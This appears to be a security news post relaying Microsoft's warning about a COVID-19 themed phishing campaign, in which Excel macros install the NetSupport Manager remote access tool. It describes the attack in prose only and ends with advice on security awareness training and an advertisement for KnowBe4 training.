Microsoft is warning of an ongoing COVID-19 themed phishing campaign that installs the NetSupport Manager remote administration tool, and spreading via malicious Excel attachments.
The attack starts with emails pretending to be from the Johns Hopkins Centre, which is sending an update on the number of Coronavirus-related deaths there are in the United States. Once opened, the document contains malicious macros, and will prompt the user to ‘Enable Content’. Once clicked, malicious macros will be executed to download and install the NetSupport Manager client from a remote site.
The NetSupport Manager is a legitimate remote administration tool commonly distributed among the hacker communities to use as a remote access Trojan, and as it is masquerading as the legitimate Desktop Windows Manager executable, it may not be noticed as unusual by users viewing Task Manager. When installed, it allows a threat actor to gain complete control over the infected machine and execute commands on it remotely, and after some time, the NetSupport Manager RAT will be used to further compromise the victim’s computer by installing other tools and scripts. It is also possible that the threat actor used the infected machine to spread laterally throughout the network.
Anyone who was affected by this phishing campaign should operate under the assumption that their data has been compromised and that the threat actor attempted to steal their passwords.
It is also possible that the threat actor used the infected machine to spread laterally throughout the network.
Educate your employees with Security Awareness Training – they need to be taught about targetted phishing attacks – regardless of whether this is via emails regarding fake domains or whether the theme is tax or flight refunds, COVID-19, an outstanding invoice, a package delivery, or any of a myriad of other stories told as above.
With thanks to the Cyber Defence Alliance and Bleeping Computer. The full story is here: https://www.bleepingcomputer.com/news/security/microsoft-warns-of-massive-phishing-attack-pushing-legit-rat/
Request A Demo: Security Awareness Training
New-school Security Awareness Training is critical to enabling you and your IT staff to connect with users and help them make the right security decisions all of the time. This isn’t a one and done deal, continuous training and simulated phishing are both needed to mobilise users as your last line of defence. Request your one-on-one demo of KnowBe4’s security awareness training and simulated phishing platform and see how easy it can be!
PS: Don’t like to click on redirected buttons? Cut & Paste this link in your browser: https://info.knowbe4.com/one-on-one-demo-partners?partnerid=001a000001lWEoJAAW